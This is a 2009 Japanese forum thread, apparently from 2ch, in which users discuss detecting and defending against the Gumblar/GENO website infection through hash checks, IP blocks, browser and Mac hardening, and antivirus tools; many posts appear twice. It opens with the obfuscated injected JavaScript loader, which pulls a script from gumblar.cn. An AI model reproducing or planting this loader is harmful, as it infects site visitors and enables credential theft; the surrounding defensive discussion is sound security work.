7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト
>>471 >>480
レスどうもありがとうございます。
>>484
丁寧な回答をどうもありがとうございました。
ソースを参照先と比べてみましたが、だいぶ違いました。
念のため→http://wepawet.cs.ucsb.edu/ でチェックしてもらってます。
大昔にタグも何も分からずビルダー先生で作ったものを、そのまま使い続けてしまっていました。
この際、きちんと見直して改装しようと思いました。
ブラウザも狐にしてJAVA無効にしました。
本当にありがとうございました。macでも気を付けます!
レスどうもありがとうございます。
>>484
丁寧な回答をどうもありがとうございました。
ソースを参照先と比べてみましたが、だいぶ違いました。
念のため→http://wepawet.cs.ucsb.edu/ でチェックしてもらってます。
大昔にタグも何も分からずビルダー先生で作ったものを、そのまま使い続けてしまっていました。
この際、きちんと見直して改装しようと思いました。
ブラウザも狐にしてJAVA無効にしました。
本当にありがとうございました。macでも気を付けます!
自分のカーネルさん
2009年3月21日23:18
サイズ:1,232,384 バイト
MD5:fa587e72f49249a882bace12712eab41
SHA-1:1a3531af7668d0c42a388c3a91a3ab1bec75c42d
なんだけど・・・あれ、まさかアウトか?
2009年3月21日23:18
サイズ:1,232,384 バイト
MD5:fa587e72f49249a882bace12712eab41
SHA-1:1a3531af7668d0c42a388c3a91a3ab1bec75c42d
なんだけど・・・あれ、まさかアウトか?
565 :GENO:2009/05/17(日) 01:39:58 ID:5i7B8IHS0
Macユーザーの対処法
○10.3までのOSユーザー
Flash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
○TigerとLeopard
Acrobatは9.1、Flash Playerは10.0.22.87以上に更新する
Acrobat Readerの初期設定からAcrobat JavaScriptをオフにする(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
○Webブラウザ内閲覧機能を切るかJavaScriptオフにする
○Firefoxの場合
3.0.10に更新してNoScript入れること(ツール→アドオン→アドオンを追加→「NoScript」を入れる)
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置き、リンク先が不正URLでないか確認した上で「一時的に許可」
○Safari・OmniWebなどWebKitベースブラウザの場合
「ダウンロードしたファイルを開く」をオフにする(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを有効にする」および「プラグインを有効にする」も切っておく。
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できる(OmniWebだけのシャットダウン、Safariには影響しません)
○自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
○BootCampでXPを入れている人
C:¥WINDOWS¥system32¥sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
○動画はようつべならMacTubes、ニコならMacNicoTunesで見る。
○10.3までのOSユーザー
Flash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
○TigerとLeopard
Acrobatは9.1、Flash Playerは10.0.22.87以上に更新する
Acrobat Readerの初期設定からAcrobat JavaScriptをオフにする(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
○Webブラウザ内閲覧機能を切るかJavaScriptオフにする
○Firefoxの場合
3.0.10に更新してNoScript入れること(ツール→アドオン→アドオンを追加→「NoScript」を入れる)
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置き、リンク先が不正URLでないか確認した上で「一時的に許可」
○Safari・OmniWebなどWebKitベースブラウザの場合
「ダウンロードしたファイルを開く」をオフにする(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを有効にする」および「プラグインを有効にする」も切っておく。
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できる(OmniWebだけのシャットダウン、Safariには影響しません)
○自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
○BootCampでXPを入れている人
C:¥WINDOWS¥system32¥sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
○動画はようつべならMacTubes、ニコならMacNicoTunesで見る。
>>3
ウィルスバスター2009でのIPブロック>>389でおk
あとフィッシング詐欺対策を有効にしておくのもお勧め
1.メイン画面→「有害サイト/迷惑メール対策」クリック
2.フィッシング詐欺対策が無効になっていた場合は有効にしておく
ウィルスバスター2009でのIPブロック>>389でおk
あとフィッシング詐欺対策を有効にしておくのもお勧め
1.メイン画面→「有害サイト/迷惑メール対策」クリック
2.フィッシング詐欺対策が無効になっていた場合は有効にしておく
>549のオーバーロールで走り高跳びが頭に浮かんだ
568 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:41:18 ID:8/IcS20M0
カーネルの話はもう良いから・・・話がややこしくなる。
sqlsodbc.chmのMD5調べたほうがよっぽど健全だよ。
sqlsodbc.chmのMD5調べたほうがよっぽど健全だよ。
>>548
ウィルススキャンしてまとめにあるとおり調べてそれでも
少しでも心配点があって夜も眠れず肌が荒れてしまうなら
うだうだしてないでOS再インストールするとかPC窓から
放り投げてみたり象に踏ませても耐えられるか実験するほうが
ここでそんなこと聞くよりよっぽど有効だよ。
ウィルススキャンしてまとめにあるとおり調べてそれでも
少しでも心配点があって夜も眠れず肌が荒れてしまうなら
うだうだしてないでOS再インストールするとかPC窓から
放り投げてみたり象に踏ませても耐えられるか実験するほうが
ここでそんなこと聞くよりよっぽど有効だよ。
>>567
いや、ロールケーキだ
いや、ロールケーキだ
>>564
ファイルバージョンを確認して、その文字列を以下のURLを開いて、
ページ内検索してみて。
ttp://www.microsoft.com/japan/technet/security/bulletin/MS09-015.mspx
ファイルバージョンを確認して、その文字列を以下のURLを開いて、
ページ内検索してみて。
ttp://www.microsoft.com/japan/technet/security/bulletin/MS09-015.mspx
MACもLinuxもJSは実行するが、その先のオブジェクトが実行される訳じゃない
575 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:43:05 ID:szav+CBc0
kernelの意味分かって言ってるの?
どんだけ釣られてるの。
どんだけ釣られてるの。
【これって】カーネルたんアウトorセーフ判定スレ【まさか?】
とか作ってそこでやればいいのに
とか作ってそこでやればいいのに
577 :GENO:2009/05/17(日) 01:43:30 ID:BFtvD8q80
まとめサイトにマカー用ウィルススキャンソフト入れてもらえないだろうか?
フリーのでClamXavというのがあるんだが、手動で随時ウィルス定義を更新&
定義更新が早くてGENO対応しているらしいとのことなので、マカーにこっちを
使ってもらえたらオンラインスキャンの負担が軽くなるんじゃないかと思って。
フリーのでClamXavというのがあるんだが、手動で随時ウィルス定義を更新&
定義更新が早くてGENO対応しているらしいとのことなので、マカーにこっちを
使ってもらえたらオンラインスキャンの負担が軽くなるんじゃないかと思って。
578 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:43:59 ID:Jm4nXT7A0
>>389
このIPブロックの情報元ってどこですか?
このIPブロックの情報元ってどこですか?
XP、sp3、avast!4.8、WindowsFW、スレイプニルを使用しています。
アドビのリーダーは入れておらず、
フラッシュプレイヤー・avast!データ更新・窓アップデート等は最新です。
現在の所感染していません。
サイトは持っていますが、ワクチンが出来るまで更新を控えようとFTPは削除しました。
まとめサイトの対策を読んだのですが、
WindowsFWで特定のIPを遮断、というのは不可能なのでしょうか?
探してみたのですが、それらしき機能が見つかりませんでした。
何か特定の物を制限するとなると、
インターネットオプション→セキュリティ→制限つきサイト
のレベルを最高(全てのチェックを無効)にするくらいかな、と思うのですが
ここの制限サイトの所に
94.247.2.0/23 (94.247.2.0 - 94.247.3.255)
95.129.145.58
95.129.144.0/23 (95.129.144.0-95.129.145.255)
78.109.29.112
94.229.65.160/27
この5つをこのままコピペして追加、という事でいいのでしょうか?
それとも、FWではないのだからこの操作は意味がありませんか?
都合上幾つかのサイト(固定)を日々閲覧しなくてはならず、
火狐の事がまったくわからないので慣れたスレイプニルの
ActiveXのDLやjs等を全て切断した制限モードで閲覧しようと思うのですが
現在は上記の状態です。何か他に対策はあるでしょうか。
頓珍漢な質問だったらすみません。
アドビのリーダーは入れておらず、
フラッシュプレイヤー・avast!データ更新・窓アップデート等は最新です。
現在の所感染していません。
サイトは持っていますが、ワクチンが出来るまで更新を控えようとFTPは削除しました。
まとめサイトの対策を読んだのですが、
WindowsFWで特定のIPを遮断、というのは不可能なのでしょうか?
探してみたのですが、それらしき機能が見つかりませんでした。
何か特定の物を制限するとなると、
インターネットオプション→セキュリティ→制限つきサイト
のレベルを最高(全てのチェックを無効)にするくらいかな、と思うのですが
ここの制限サイトの所に
94.247.2.0/23 (94.247.2.0 - 94.247.3.255)
95.129.145.58
95.129.144.0/23 (95.129.144.0-95.129.145.255)
78.109.29.112
94.229.65.160/27
この5つをこのままコピペして追加、という事でいいのでしょうか?
それとも、FWではないのだからこの操作は意味がありませんか?
都合上幾つかのサイト(固定)を日々閲覧しなくてはならず、
火狐の事がまったくわからないので慣れたスレイプニルの
ActiveXのDLやjs等を全て切断した制限モードで閲覧しようと思うのですが
現在は上記の状態です。何か他に対策はあるでしょうか。
頓珍漢な質問だったらすみません。
>>565 乙!
581 :geno:2009/05/17(日) 01:44:57 ID:ZlOuERst0
sqlsodbc.chmが1323バイトなのだが
感染確定なの??
kernelはどうなの??
感染確定なの??
kernelはどうなの??
582 :GENO:2009/05/17(日) 01:45:13 ID:HhGbn2rD0
583 :GD:2009/05/17(日) 01:45:27 ID:ueGxpPuI0
kerioのFWは接続しようとする許可したプログラムが変更された場合
警告が出る。つまりハッシュを監視している。
警告が出る。つまりハッシュを監視している。
サイトのjavascript使うものは全部消してきた
ソースみて安全なjavascriptでも怖がる人いそうだから
ソースみて安全なjavascriptでも怖がる人いそうだから
585 :GENO:2009/05/17(日) 01:45:36 ID:/qIfNmc30
>>488
ハッシュ値もチェックしてみたけど全て同じ・・・・・・・
他に異常は全く見受けられないんだがこれはどうなんだろうか・・・・
クレカで買い物しまくってるしオンライン銀行何個も持ってるのに勘弁してくれよもうorz
ハッシュ値もチェックしてみたけど全て同じ・・・・・・・
他に異常は全く見受けられないんだがこれはどうなんだろうか・・・・
クレカで買い物しまくってるしオンライン銀行何個も持ってるのに勘弁してくれよもうorz
>>571
さっきからお前のレスを見てると腹がへってくる
さっきからお前のレスを見てると腹がへってくる
カーネルは今んとこ関係ないっつってんだろ
588 :GENO:2009/05/17(日) 01:46:12 ID:QyWL1QXS0
>>581
いい加減にしろよ、過去スレ読め
いい加減にしろよ、過去スレ読め
589 :GD:2009/05/17(日) 01:46:24 ID:ueGxpPuI0
590 :GENO:2009/05/17(日) 01:46:54 ID:OukNUfSz0
591 :GENO:2009/05/17(日) 01:47:11 ID:/qIfNmc30
>>494
同じく
同じく
593 :GENO:2009/05/17(日) 01:47:41 ID:PZIP1ghR0
594 :GENO:2009/05/17(日) 01:48:13 ID:Co0JIJet0
ハッシュ値 というのを読んでハッシュドポテト食いたくてたまらなくなった。
近所にマックないんだ…orz
近所にマックないんだ…orz
しばらくは専ブラで板巡回くらいしか出来ないな
後、自分がホスト立ててそこに何人かクライアント呼び込んで遊ぶタイプのゲームやってるんだが
クライアントが感染してたらこっちに飛び火してくるなんて事はないよな?
後、自分がホスト立ててそこに何人かクライアント呼び込んで遊ぶタイプのゲームやってるんだが
クライアントが感染してたらこっちに飛び火してくるなんて事はないよな?
書き込む前に何故リロードしない奴が多いんだ
599 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:49:33 ID:Jm4nXT7A0
>>566追加します
>>577入れますんでURLくださいな
あと現在情報が埋もれまくりなので、Wiki関連は>3入れてください
マカーは全然わからないので>>445的な感じを考えてますが
新規ページ作って>>○○追加、みたいな感じでまとまり次第>3につけといてください
(595まで確認)
>>577入れますんでURLくださいな
あと現在情報が埋もれまくりなので、Wiki関連は>3入れてください
マカーは全然わからないので>>445的な感じを考えてますが
新規ページ作って>>○○追加、みたいな感じでまとまり次第>3につけといてください
(595まで確認)
>>578
セキュ板で見たような気がする
セキュ板で見たような気がする
602 :GENO:2009/05/17(日) 01:49:53 ID:juU+TMyj0
>565追記
○Leopard(10.5.x)ユーザーは早急に10.5.7へアップグレードすること
導入の際Safariは3.2.3へ強制アップデートされます
(Apple Software UpdateのほかApple公式→Mac OS X 10.5.7 統合アップデート(729 MB)をDL)
○Tiger(10.4.11)はSecurity Update 2009-002 for Tiger の導入を忘れずに
○Panther(10.3.9)以下のユーザーはなるべく早く最新OS環境へ移行するか、
>565の通りFlash Player・Acrobat Readerをアンインストールしましょう
○ClamXav 1.1.1 e951を導入すること(OS10.2〜10.5まで対応、無料)
JSRedir-R対応済み最新バージョンです(5/17 午前1時更新)。
BootCampでXP・Vista導入している人で、カスペのオンラインスキャンを実行したひとでも
一度MacOS環境上からBootCamp領域を完全スキャンして下さい。
○Leopard(10.5.x)ユーザーは早急に10.5.7へアップグレードすること
導入の際Safariは3.2.3へ強制アップデートされます
(Apple Software UpdateのほかApple公式→Mac OS X 10.5.7 統合アップデート(729 MB)をDL)
○Tiger(10.4.11)はSecurity Update 2009-002 for Tiger の導入を忘れずに
○Panther(10.3.9)以下のユーザーはなるべく早く最新OS環境へ移行するか、
>565の通りFlash Player・Acrobat Readerをアンインストールしましょう
○ClamXav 1.1.1 e951を導入すること(OS10.2〜10.5まで対応、無料)
JSRedir-R対応済み最新バージョンです(5/17 午前1時更新)。
BootCampでXP・Vista導入している人で、カスペのオンラインスキャンを実行したひとでも
一度MacOS環境上からBootCamp領域を完全スキャンして下さい。
>594
もうwお前のせいでカップ麺開封したじゃないか
もうwお前のせいでカップ麺開封したじゃないか
>>582
むしろ、Safariは使用回避の方が良くない?
>>585
このトロイに限っていえば、通信を監視して、FTPを盗聴するタイプの可能性が高いから、
そういう意味では過剰な不安は要らないと思うよ。
>>592
ファイルバージョンはいくらだった?
むしろ、Safariは使用回避の方が良くない?
>>585
このトロイに限っていえば、通信を監視して、FTPを盗聴するタイプの可能性が高いから、
そういう意味では過剰な不安は要らないと思うよ。
>>592
ファイルバージョンはいくらだった?
>>428
コントロールパネル>プログラムの追加と削除>Adobe Flash Player (バージョン名)選択
>サポート情報を参照するには、ここをクリックしてください。
からでもアドビフラッシュプレイヤーのバージョンは確認できる。(最新ver10.0.22.87)
ディレクトリ構造が分からん人はこっちでもいいかもな。間違って削除ボタンを押しても
知らんが。dll消すよりはマシだし、最新版を再インストールすりゃ済む話しだしね。
コントロールパネル>プログラムの追加と削除>Adobe Flash Player (バージョン名)選択
>サポート情報を参照するには、ここをクリックしてください。
からでもアドビフラッシュプレイヤーのバージョンは確認できる。(最新ver10.0.22.87)
ディレクトリ構造が分からん人はこっちでもいいかもな。間違って削除ボタンを押しても
知らんが。dll消すよりはマシだし、最新版を再インストールすりゃ済む話しだしね。
609 :geno:2009/05/17(日) 01:52:46 ID:/3OwKYN30
さっきから腹が減るスレだな
このスレ見て焦ってavast入れて全スキャンかけたんだが
マカフィー入ってるのを忘れてた
一応スキャン終わったんだけどavastアンインストールした方が良い・・・?
というかavastの全スキャンが20分もかからずに終わったけどこんなもんなの?
マカフィー入ってるのを忘れてた
一応スキャン終わったんだけどavastアンインストールした方が良い・・・?
というかavastの全スキャンが20分もかからずに終わったけどこんなもんなの?
今の流れだと誤解を生みそう。
まずmacは基本的に感染のしようがないので大丈夫。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
という根本を書いておかないと混乱を招くだけだよ。
まずmacは基本的に感染のしようがないので大丈夫。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
という根本を書いておかないと混乱を招くだけだよ。
つまらん食い物ネタで遊びたい奴は他行けよ
もう皆で何か食いながらマターリ対策練るスレでいいじゃない
このままのスピードだったら一晩で6か7ぐらい行きそうだし鯖に負担かけるのイクナイ
このままのスピードだったら一晩で6か7ぐらい行きそうだし鯖に負担かけるのイクナイ
safariもやばいの?
617 :GENO:2009/05/17(日) 01:54:59 ID:HhGbn2rD0
>>617
あえて、良さが全部殺されたOpera@Macを推奨するとか、どう?w
あえて、良さが全部殺されたOpera@Macを推奨するとか、どう?w
>>565おつ
・不可視属性ファイルを可視化する
ターミナル起動
不可視含め全ファイル表示:defaults write com.apple.finder AppleShowAllFiles true
リターンしてFinder再起動:killall Finder
全部のFinderが消えて再起動し、不可視ファイルが表示された状態になる。
戻すとき:defaults write com.apple.finder AppleShowAllFiles false
TinkerTool、Onyxなどを使うのもおk
マカー用ウイルススキャンソフト(フリー)
ClamXav:http://www.clamxav.com/index.php?page=dl
TinkerTool:http://www.bresink.de/osx/0TinkerTool/download.html
Onyx:http://www.titanium.free.fr/pgs2/english/download.html
BootCamp使ってる人は不可視→可視化後
スレやまとめで上がったファイルを検索してチェック
・不可視属性ファイルを可視化する
ターミナル起動
不可視含め全ファイル表示:defaults write com.apple.finder AppleShowAllFiles true
リターンしてFinder再起動:killall Finder
全部のFinderが消えて再起動し、不可視ファイルが表示された状態になる。
戻すとき:defaults write com.apple.finder AppleShowAllFiles false
TinkerTool、Onyxなどを使うのもおk
マカー用ウイルススキャンソフト(フリー)
ClamXav:http://www.clamxav.com/index.php?page=dl
TinkerTool:http://www.bresink.de/osx/0TinkerTool/download.html
Onyx:http://www.titanium.free.fr/pgs2/english/download.html
BootCamp使ってる人は不可視→可視化後
スレやまとめで上がったファイルを検索してチェック
621 :GENO:2009/05/17(日) 01:56:04 ID:Co0JIJet0
>>604
カップ麺があるだけ羨ましいぞwww 仕方ないから黒糖くるみとか食ってる…腹の足しにならん
kingsoftがどうなのかさっぱり判らんのだが何も言ってこないところみると大丈夫と思っていいのかな。
カップ麺があるだけ羨ましいぞwww 仕方ないから黒糖くるみとか食ってる…腹の足しにならん
kingsoftがどうなのかさっぱり判らんのだが何も言ってこないところみると大丈夫と思っていいのかな。
とりあえず、セキュリティソフト屋が手早く対応してくれれば
この騒ぎは沈静化する、よな?
ノートン先生早くしてくれ
安くない金払っているんだから
この騒ぎは沈静化する、よな?
ノートン先生早くしてくれ
安くない金払っているんだから
誰かわかる人、回答頼む。
94.229.65.160/27 は
94.229.65.160 - 94.229.65.191 の範囲を表す
ってことでいいの?
94.229.65.160/27 は
94.229.65.160 - 94.229.65.191 の範囲を表す
ってことでいいの?
ノートン先生頑張って!!!
と言って流石に本日は寝る・・・
色々回答して下さった方本当にありがとうございました。
と言って流石に本日は寝る・・・
色々回答して下さった方本当にありがとうございました。
625 :geno:2009/05/17(日) 01:58:44 ID:ZlOuERst0
システム復元してcmdとかregeditとか立ち上がるのだが
この状態でカスペオンラインでチェックして
赤じゃなければ寝ていい??
この状態でカスペオンラインでチェックして
赤じゃなければ寝ていい??
>>605
5.1.2600.3541 だったよ
5.1.2600.3541 だったよ
627 :GENO:2009/05/17(日) 01:59:10 ID:/BtRfzOz0
628 :GENO:2009/05/17(日) 01:59:28 ID:BFtvD8q80
>3
ttp://www.clamxav.com/
左のページナビのDLをクリックすればOSのバージョンごとに案内が出る。
ダウンロードしたらまず「ウイルス定義を更新」をクリックして最新の定義をいれること。
環境設定のスケジュールで定期スキャンが設定できるが、ウイルス定義の更新は自動では
されないので、なるべく使用せず手動スキャン推奨。
フォルダ監視ができるのでサイトのローカル保存フォルダを指定するのは大丈夫。
ただしMac対応した亜種が発生して感染しても定義を更新するまで引っかからない可能性が
あるので、あまり過信しないほうがいい。
ttp://www.clamxav.com/
左のページナビのDLをクリックすればOSのバージョンごとに案内が出る。
ダウンロードしたらまず「ウイルス定義を更新」をクリックして最新の定義をいれること。
環境設定のスケジュールで定期スキャンが設定できるが、ウイルス定義の更新は自動では
されないので、なるべく使用せず手動スキャン推奨。
フォルダ監視ができるのでサイトのローカル保存フォルダを指定するのは大丈夫。
ただしMac対応した亜種が発生して感染しても定義を更新するまで引っかからない可能性が
あるので、あまり過信しないほうがいい。
>>572
すごいな、このページは安全確認に便利そうだ
すごいな、このページは安全確認に便利そうだ
>606
ttp://forums.cnet.com/のHot discussions→VIRUS SPYWARE ALERTS
→Trojan-PSW.Win32.Kates.c対応状況 14日(日本時間15日)には報告あり
ttp://forums.cnet.com/のHot discussions→VIRUS SPYWARE ALERTS
→Trojan-PSW.Win32.Kates.c対応状況 14日(日本時間15日)には報告あり
632 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:02:06 ID:Bie8Ee4B0
ノートンやウイルスバスターがこのままロクに新規ウイルスに対応出来ない様じゃ
個人向けパッケージウイルスソフトの市場は崩壊するかも知れん
無料で使えるソフトの方がマシって一般層に広まっちゃったらエライ事ですよ
個人向けパッケージウイルスソフトの市場は崩壊するかも知れん
無料で使えるソフトの方がマシって一般層に広まっちゃったらエライ事ですよ
634 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:03:28 ID:8/IcS20M0
>>625
セキュリティ板で同じこと聞いたらちゃんと教えてくれるかもしれない。
セキュリティ板で同じこと聞いたらちゃんと教えてくれるかもしれない。
まとめサイトやここみて火狐いれたんだけど
AdobeFlashとかが上手くインストール出来ない…火狐初めてだから不慣れなんだけど
IEとはダウンロードの仕方が違うの?
ググッたりしたけど上手く解決方法が見つからない
AdobeFlashとかが上手くインストール出来ない…火狐初めてだから不慣れなんだけど
IEとはダウンロードの仕方が違うの?
ググッたりしたけど上手く解決方法が見つからない
それにしてもVIPなみにスレの伸びがはぇえ
>636
どういう風にインストールできないのか言わないといいようがない
どういう風にインストールできないのか言わないといいようがない
シマンテックエンドポイントプロテクション、昨日から定義ファイルの
更新が三回あったけど対応してるんだろうか
落ち着かねえ
更新が三回あったけど対応してるんだろうか
落ち着かねえ
>>636
そっから先になるともうそういう板で聞いてくれとしか・・・
そっから先になるともうそういう板で聞いてくれとしか・・・
643 :GENO:2009/05/17(日) 02:07:32 ID:/3OwKYN30
土日だし、ここ同人板だし
自分みたいに徹夜で原稿やりつつチェックしてるのも居るだろう
いい情報でも悪い情報でも何でもいいから欲しいしね、今は
自分みたいに徹夜で原稿やりつつチェックしてるのも居るだろう
いい情報でも悪い情報でも何でもいいから欲しいしね、今は
まとめwiki見ろっていうのは釣りだからな
一番危ないのはまとめwiki
一番危ないのはまとめwiki
648 :GENO:2009/05/17(日) 02:09:15 ID:wXDJe0Ek0
>>3
>>613が言っている通りで、Macユーザー用のページを作るなら
冒頭にこのように入れてから、対策をコピペしてほしい。でないと誤解を招く。
↓
今現在のウイルスの構造ではMacに感染しない。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
>>613が言っている通りで、Macユーザー用のページを作るなら
冒頭にこのように入れてから、対策をコピペしてほしい。でないと誤解を招く。
↓
今現在のウイルスの構造ではMacに感染しない。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
649 :GENO:2009/05/17(日) 02:09:41 ID:BFtvD8q80
何で?
アドビのサイトからフラッシュプレイヤーをダウンロード
FireFoxを閉じてさっき落としてきたexeを実行
インスト出来たらfirefoxを起動する
IEみたいに自動ではインストできないよ。
FireFoxを閉じてさっき落としてきたexeを実行
インスト出来たらfirefoxを起動する
IEみたいに自動ではインストできないよ。
653 :GENO:2009/05/17(日) 02:10:48 ID:RvywqyVs0
Vistaは大丈夫なの?
cmd.exe、regedit.exeは起動出来てるけど他の確認方法が…
cmd.exe、regedit.exeは起動出来てるけど他の確認方法が…
654 :GENO:2009/05/17(日) 02:10:53 ID:/3OwKYN30
655 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:11:08 ID:Wzgj+9y70
サイトにまとめwikiアドを忠告という意味で載せといたんだが
一番危ないのはまとめwikiをみて不安が・・・載せたままで大丈夫かな?
一番危ないのはまとめwikiをみて不安が・・・載せたままで大丈夫かな?
656 :GENO:2009/05/17(日) 02:11:32 ID:n5RlUS/yP
>>572のページで確認してみたところ、kernel32.dllは以下のものと全て一致
自分、まだSP2なんだけどSP3GDRフォルダに入ってたw
kernel32.dll バージョン→5.1.2600.5781 日付→2009/3/21 時間→23:07 サイズ→1.235.968
これは安全って事でいいんですかね?
自分、まだSP2なんだけどSP3GDRフォルダに入ってたw
kernel32.dll バージョン→5.1.2600.5781 日付→2009/3/21 時間→23:07 サイズ→1.235.968
これは安全って事でいいんですかね?
>3
本物そっくりの「Flash Player 10」偽サイト出現、目的はウイルス配布
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/?ST=securityhole
↑早速こういう便乗悪質偽装トロイの木馬散布サイトが出てきているので注意。
Adobe公式サイト→ダウンロード→FlashPlayer、必ずURLを確認すること
Safariは去年からWindows版が登場しているので、Firefox・Operaほどではないにしろ
標的にされる覚悟と危機意識はもつにこしたことはありません。
本物そっくりの「Flash Player 10」偽サイト出現、目的はウイルス配布
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/?ST=securityhole
↑早速こういう便乗悪質偽装トロイの木馬散布サイトが出てきているので注意。
Adobe公式サイト→ダウンロード→FlashPlayer、必ずURLを確認すること
Safariは去年からWindows版が登場しているので、Firefox・Operaほどではないにしろ
標的にされる覚悟と危機意識はもつにこしたことはありません。
659 :GENO:2009/05/17(日) 02:12:24 ID:Co0JIJet0
647は釣りだろ。
でないと恐すぎる
でないと恐すぎる
660 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:12:24 ID:Dp8cUJp60
不要なサイトをhostsファイルに加えるスレ
http://pc12.2ch.net/test/read.cgi/win/1129451974/
http://pc12.2ch.net/test/read.cgi/win/1129451974/
>>653
自分もvistaだが
cmdもregditも起動できるか。
sqlsodbcのサイズも確認。
カスペルとニフティで全部スキャン。
サイトのソースも全部チェック。
ぐらいできてれば今のとこいいんじゃまいか?
自分もvistaだが
cmdもregditも起動できるか。
sqlsodbcのサイズも確認。
カスペルとニフティで全部スキャン。
サイトのソースも全部チェック。
ぐらいできてれば今のとこいいんじゃまいか?
うちはGENOの簡単な説明と注意勧告と自分の環境はセフセフなことだけ載せたよ
URL貼りつけるのも不安に思わせるかもしれないし
wikiその他のまとめの名前挙げて自分で調べてくださいって書いた
URL貼りつけるのも不安に思わせるかもしれないし
wikiその他のまとめの名前挙げて自分で調べてくださいって書いた
私は>>428ではありませんが>>607わかりやすかったです
ですがAdobe Flash Player10と Adobe Flash Player10 ActiveXとは
同じものなのでしょうか
どうもそれ以外にAdobe Flash Playerは入っていないようです
へたにアップロードしないほうがいいですかね
ですがAdobe Flash Player10と Adobe Flash Player10 ActiveXとは
同じものなのでしょうか
どうもそれ以外にAdobe Flash Playerは入っていないようです
へたにアップロードしないほうがいいですかね
666 : :2009/05/17(日) 02:14:56 ID:27OC+pNi0
今更だが>>9って不正確だね
> 【よくある質問】
> Q:感染するとどうなるの?
> A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
> パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
> 感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
> そのサイトを見た人を感染させます。
FTPのパスワードを抜くのはおそらくFTPで通信した時点だし、
その他の情報は抜かれるかどうかまだ謎のままだ
> 【よくある質問】
> Q:感染するとどうなるの?
> A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
> パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
> 感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
> そのサイトを見た人を感染させます。
FTPのパスワードを抜くのはおそらくFTPで通信した時点だし、
その他の情報は抜かれるかどうかまだ謎のままだ
まとめwiki貶める奴が定期的に湧くがどういう了見だ?
サイトのソースに不自然な記号の羅列がなければセーフでいいのかな
なぜ危険なのかについて一切説明がないのになぜ怖くなるのかが分からんわ
>664
Adobe Flash Player10…Firefox、Safari、Opera用
Adobe Flash Player10 ActiveX…IEシリーズおよびIEエンジンを使ったブラウザ用(スレイプニルなど)
Adobe Flash Player10…Firefox、Safari、Opera用
Adobe Flash Player10 ActiveX…IEシリーズおよびIEエンジンを使ったブラウザ用(スレイプニルなど)
なんのためにまとめwikiの人が張り付いて情報更新してくれてるんだ…と思うが
信用ならないなら自分でまとめ作ってサイトにおけば?
信用ならないなら自分でまとめ作ってサイトにおけば?
672 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:15:18 ID:tVuAN5GY0
このスレみて同人板の程度の低さに辟易した
